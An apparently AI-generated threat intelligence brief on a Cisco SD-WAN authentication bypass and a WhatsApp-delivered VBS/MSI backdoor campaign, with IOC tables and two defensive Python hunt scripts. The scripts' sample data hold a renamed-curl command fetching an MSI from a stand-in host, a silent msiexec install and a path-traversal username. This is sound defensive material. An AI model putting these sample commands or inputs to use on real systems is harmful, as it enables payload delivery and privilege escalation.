Cyber Threat Brief — April 5 2026
⚠️ This report is AI-generated. Always validate findings.
1. Cisco SD-WAN Auth Bypass Gets Metasploit Module + Five Eyes Hunt Guide — CVE-2026-20127
TL;DR: A CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN Controller/Manager now has a public Metasploit module (sfewer-r7) and a Five Eyes co-signed IOC hunt guide. UAT-8616 has exploited this since 2023 for fabric-level persistence.
What’s New:
- Metasploit auxiliary module merged March 20 via sfewer-r7/CVE-2026-20127; second PoC by zerozenxlabs also public
- Five Eyes (ACSC/NCSC) hunt guide released with behavioral IOCs for SD-WAN control-plane compromise
- Post-exploitation chain: rogue peer addition → NETCONF (port 830) manipulation → software version downgrade to re-exploit CVE-2022-20775 for root → version restore to evade detection
- Affects Catalyst SD-WAN Controller (vSmart) and Manager (vManage); tested on v20.15.3
- No lateral movement outside SD-WAN components observed, but full fabric config control achieved
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Accepted publickey for vmanage-admin from unknown IP | Log entry | T1078.001 | /var/log/auth.log | Hunt — validate all vmanage-admin SSH sessions |
| Unrecognized system IPs in SD-WAN Manager WebUI | Config anomaly | T1199 | SD-WAN Manager UI / API | Hunt — audit peer list against known inventory |
| Software version downgrade + reboot sequence | Behavioral | T1601.001 | /var/volatile/log/sw_script_synccdb.log, /var/log/tmplog/vdebug | Hunt — alert on any unscheduled downgrade |
| Path traversal in username (/../../) | Exploit artifact | T1068 | /var/log/auth.log | Block/Alert — CVE-2022-20775 escalation indicator |
| NETCONF sessions on port 830 from unauthorized IPs | Network | T1021 | Firewall/NetFlow | Block — restrict NETCONF to management VLAN |
| New local user account creation | Persistence | T1136.001 | SD-WAN Manager audit logs | Alert — correlate with change management |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None specific | Need: SD-WAN peering event anomaly detection, vmanage-admin auth from untrusted IPs |
| Elastic | None specific | Need: Cisco SD-WAN log parsing + behavioral rules for downgrade-reboot sequences |
| Sigma | None specific | Need: Generic auth.log rules for publickey from unauthorized sources, path traversal in usernames |
Sources: Rapid7 PoC · Cisco Talos UAT-8616 · Greenbone Advisory · SOCRadar Analysis
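The Sigma gap above (publickey logins from unauthorized sources, traversal sequences in usernames) as an added hunt script, not code from the brief or from any of its sources. The auth.log lines and the management allowlist are constructed for the example; the line format assumes standard sshd syslog output.

```python
import re
from dataclasses import dataclass

# Constructed sample auth.log lines (not from the brief); IPs use documentation ranges.
SAMPLE_AUTH_LOG = """\
Mar 21 02:14:07 vmanage sshd[2113]: Accepted publickey for vmanage-admin from 10.10.0.5 port 51022 ssh2: RSA SHA256:AAAA
Mar 21 02:15:40 vmanage sshd[2140]: Accepted publickey for vmanage-admin from 198.51.100.23 port 40110 ssh2: RSA SHA256:BBBB
Mar 21 02:16:02 vmanage sshd[2162]: Invalid user /../../tmp/x from 198.51.100.23 port 40211
Mar 21 02:17:15 vmanage sshd[2190]: Accepted password for admin from 10.10.0.9 port 51100 ssh2
"""

# Assumption: the defender maintains an allowlist of management hosts; these values are constructed.
MGMT_ALLOWLIST = {"10.10.0.5", "10.10.0.9"}

ACCEPTED_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+)")
INVALID_RE = re.compile(r"Invalid user (?P<user>\S+) from (?P<ip>[\d.]+)")
# A ".." path component anywhere in the username field is never legitimate.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")


@dataclass(frozen=True)
class Finding:
    line_no: int
    technique: str
    reason: str
    ip: str


def hunt_auth_log(text, allowlist=MGMT_ALLOWLIST):
    """Return findings for the two table rows: vmanage-admin logins from
    non-allowlisted IPs (T1078.001) and traversal sequences in usernames (T1068)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ACCEPTED_RE.search(line)
        if m and m["user"] == "vmanage-admin" and m["ip"] not in allowlist:
            findings.append(Finding(n, "T1078.001",
                                    "vmanage-admin publickey login from non-allowlisted IP", m["ip"]))
        for rx in (ACCEPTED_RE, INVALID_RE):
            m = rx.search(line)
            if m and TRAVERSAL_RE.search(m["user"]):
                findings.append(Finding(n, "T1068", "path traversal sequence in username", m["ip"]))
                break
    return findings


if __name__ == "__main__":
    for f in hunt_auth_log(SAMPLE_AUTH_LOG):
        print(f"line {f.line_no}: {f.technique} {f.reason} ({f.ip})")
```

Both findings in the sample come from the same source IP, which is the correlation the hunt guide's rogue-peer plus downgrade chain would surface.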
2. WhatsApp VBS/MSI Backdoor Campaign Leverages LOLBins for Persistent Access
TL;DR: Microsoft disclosed a campaign delivering malicious VBS files via WhatsApp messages that chains renamed LOLBins, cloud-hosted payloads, and unsigned MSI packages to establish persistent remote access on Windows endpoints.
What’s New:
- Microsoft Defender Experts published full attack chain analysis March 31; campaign active since late February 2026
- VBS files drop renamed Windows utilities into C:\ProgramData hidden folders: curl.exe → netapi.dll, bitsadmin.exe → sc.exe
- Payloads retrieved from AWS, Tencent Cloud, and Backblaze B2 to evade domain-based blocking
- Malicious MSI packages (Setup.msi, WinRAR.msi, LinkPoint.msi, AnyDesk.msi) install remote access tools
- UAC bypass via registry tampering under HKLM\Software\Microsoft\Win; OriginalFileName PE metadata mismatch is primary detection signal
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| curl.exe renamed as netapi.dll in C:\ProgramData | File rename | T1036.005 | Sysmon EID 1/11 | Alert — OriginalFileName ≠ process name |
| bitsadmin.exe renamed as sc.exe in C:\ProgramData | File rename | T1036.005 | Sysmon EID 1/11 | Alert — OriginalFileName mismatch |
| Setup.msi, WinRAR.msi, LinkPoint.msi, AnyDesk.msi | MSI payload | T1218.007 | Sysmon EID 1, Windows Installer logs | Block — unsigned MSI from temp/ProgramData paths |
| Hidden folders in C:\ProgramData | Staging | T1564.001 | Sysmon EID 11 | Hunt — new hidden dirs under ProgramData |
| Trojan:VBS/Obfuse.KPP!MTB, Trojan:VBS/BypassUAC.PAA!MTB | Defender sigs | T1059.005 | Defender/MDE alerts | Alert — existing coverage |
| Registry writes to HKLM\Software\Microsoft\Win UAC keys | Persistence | T1548.002 | Sysmon EID 13 | Alert — UAC setting tampering |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Windows System Binary Proxy Execution (partial) | Need: specific OriginalFileName vs. actual filename mismatch for LOLBin renames |
| Elastic | Renamed Binary Execution (partial) | Need: MSI execution from ProgramData/hidden paths |
| Sigma | proc_creation_win_renamed_binary.yml | Covers OriginalFileName mismatch — verify deployed and tuned |
Sources: Microsoft Security Blog · Malwarebytes Analysis · CSO Online
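The OriginalFileName mismatch and MSI-from-ProgramData checks from the table above as an added triage script over Sysmon Event ID 1 records; this is example code, not Microsoft's or the brief's own detection logic. The event records and the `.cache` staging directory are constructed; only the Sysmon field names (Image, OriginalFileName, CommandLine) are real.

```python
import ntpath

# Constructed Sysmon EID 1 (process create) records, reduced to the fields the checks use.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\.cache\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.cache\Setup.msi https://example.invalid/p"},
    {"Image": r"C:\ProgramData\.cache\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "sc.exe /transfer j"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\ProgramData\.cache\Setup.msi" /qn'},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "CommandLine": "sc.exe query"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\bob\Downloads\7z.msi"'},
]

# Raw strings cannot end in a backslash, so the prefix is written with escapes.
STAGING_PREFIXES = ("c:\\programdata\\",)


def renamed_binary(ev):
    """T1036.005: the PE's OriginalFileName names the real tool; a mismatch with the
    on-disk name flags a renamed LOLBin. Sysmon writes '-' when the field is absent."""
    orig = ev.get("OriginalFileName", "-")
    image_name = ntpath.basename(ev["Image"])
    if orig in ("", "-", "?"):
        return None
    if orig.lower() != image_name.lower():
        return ("T1036.005", f"{image_name} has OriginalFileName {orig}")
    return None


def msi_from_staging(ev):
    """T1218.007: msiexec installing a package that lives under ProgramData."""
    if ntpath.basename(ev["Image"]).lower() != "msiexec.exe":
        return None
    cmd = ev["CommandLine"].lower()
    if ".msi" in cmd and any(p in cmd for p in STAGING_PREFIXES):
        return ("T1218.007", "msiexec installing package from ProgramData")
    return None


def triage(events):
    """Return (image, technique, reason) for every event that trips a check."""
    hits = []
    for ev in events:
        for check in (renamed_binary, msi_from_staging):
            r = check(ev)
            if r:
                hits.append((ev["Image"], *r))
    return hits
```

The mismatch check deliberately ignores events with no OriginalFileName rather than alerting on them, since scripts and unsigned tools commonly lack version resources.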
Status Updates
- CVE-2026-20131 (Cisco FMC): Interlock ransomware exploitation ongoing; no new IOCs or detection rules since initial coverage. Original brief.
- CVE-2026-20093 (Cisco IMC): CVSS 9.8 auth bypass patched April 1-2; still no public PoC or ITW exploitation. Monitor for PoC release. Original brief.
- CVE-2026-5281 (Chrome Dawn): CISA KEV deadline April 15; no attribution or new IOCs. Verify Chrome ≥146.0.7680.178 across fleet. Original brief.
- UAT-10608 React2Shell (CVE-2025-55182): Talos reports exploitation ongoing; 766+ hosts compromised. Attacker IPs unchanged. Original brief.